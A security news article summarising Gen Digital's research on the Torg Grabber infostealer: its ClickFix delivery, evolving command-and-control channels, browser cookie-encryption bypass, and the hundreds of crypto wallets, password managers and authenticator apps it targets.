New Torg Grabber infostealer malware targets 728 crypto wallets

Security researchers have identified a sophisticated new information-stealing malware called Torg Grabber that poses a significant threat to cryptocurrency users and digital security. This malicious software specifically targets 850 browser extensions, with over 700 of these focused on cryptocurrency wallets.

The malware employs the ClickFix technique to establish initial access, manipulating the clipboard to deceive users into executing malicious PowerShell commands. This social engineering approach has proven effective in compromising target systems.

Cybersecurity company Gen Digital reports that Torg Grabber demonstrates active and rapid development cycles. Between December 2025 and February 2026, researchers identified 334 unique samples, with threat actors registering new command-and-control (C2) servers on a weekly basis.

Beyond cryptocurrency wallets, Torg Grabber's scope extends to 103 password management applications, two-factor authentication tools, and 19 note-taking applications, representing a comprehensive threat to personal digital security.

Sophisticated evolution and technical capabilities

Gen Digital's technical analysis reveals significant evolution in Torg Grabber's architecture and communication protocols. The malware's initial versions utilized Telegram-based communication channels before transitioning to a custom, encrypted TCP protocol for data exfiltration.

A notable shift occurred on December 18, 2025, when developers abandoned both previous mechanisms in favor of HTTPS connections routed through Cloudflare infrastructure. This new approach supports chunked data uploads and enhanced payload delivery capabilities.

The malware incorporates advanced evasion techniques, including multi-layered obfuscation, anti-analysis mechanisms, direct syscalls, and reflective loading. These features enable the malware to operate entirely within system memory, significantly reducing detection probability.

On December 22, 2025, Torg Grabber enhanced its capabilities by integrating App-Bound Encryption (ABE) bypass functionality. This addition enables the malware to circumvent cookie protection systems implemented in Chrome, Brave, Edge, Vivaldi, and Opera browsers.

Researchers also discovered an associated tool called Underground, designed specifically for browser data extraction. This tool employs reflective DLL injection into browsers, accessing Chrome's COM Elevation Service to extract master encryption keys—a technique similar to methods observed in VoidStealer malware.

Comprehensive data harvesting operations

Torg Grabber demonstrates extensive browser compatibility, targeting 25 Chromium-based browsers and 8 Firefox variants. The malware systematically extracts credentials, cookies, and autofill data from infected systems.

The cryptocurrency wallet targeting is particularly comprehensive, with researchers noting that the 728 targeted wallets represent "essentially every crypto wallet ever conceived by human optimism." Major platforms including MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, TronLink, Ronin, OKX, Keplr, Rabby, Sui, and Solflare are all within scope.

The malware's targeting extends beyond prominent platforms to include smaller projects with limited user bases, demonstrating the thoroughness of the threat actors' approach.

For password management and authentication, Torg Grabber targets 103 extensions, including industry leaders such as LastPass, 1Password, Bitwarden, KeePass, NordPass, Dashlane, ProtonPass, Enpass, Psono, Pleasant Password Server, heylogin, 2FAAuth, GAuth, TOTP Authenticator, and Akamai MFA.

The malware's data collection capabilities extend to communication platforms (Discord, Telegram), gaming services (Steam), VPN applications, FTP clients, email platforms, password managers, and desktop cryptocurrency wallet applications.

Additionally, Torg Grabber performs comprehensive system profiling, including hardware fingerprinting, software inventory documentation (covering 24 antivirus solutions), desktop screenshot capture, and file theft from Desktop and Documents folders.

A particularly concerning capability involves remote shellcode execution on compromised devices. This functionality receives encrypted and compressed payloads from command-and-control servers using ChaCha encryption and zlib compression.

Gen Digital emphasizes that Torg Grabber continues rapid development, with weekly registration of new C2 domains and expanding operator networks. At the time of analysis, researchers had documented 40 distinct operational tags, indicating a growing threat landscape.